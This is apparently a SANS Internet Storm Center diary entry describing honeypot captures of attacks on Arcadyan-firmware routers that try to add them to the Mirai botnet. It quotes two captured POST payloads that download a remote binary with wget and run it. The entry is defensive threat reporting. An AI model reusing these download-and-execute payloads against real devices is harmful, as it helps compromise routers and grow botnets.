Over the past 7 days, my honeypot captured a few hundred POST for a vulnerability which appeared to be tracked as a critical path traversal vulnerability in the web interfaces of routers with Arcadyan firmware. If successfully exploited, could allow unauthenticated remote actors to bypass authentication and add the router to the botnet Mirai botnet.
20211125-135312: 192.168.25.9:80-188.8.131.52:44670 data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//184.108.40.206/bins/mpsl;chmod 777 *;./mpsl selfrep.asus
20211126-090429: 192.168.25.9:80-220.127.116.11:39036 data
POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http[:]//18.104.22.168/bins/mpsl;chmod 777 *;./mpsl selfrep.asus
Indicators Top 10 IPs
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Source: SANS storm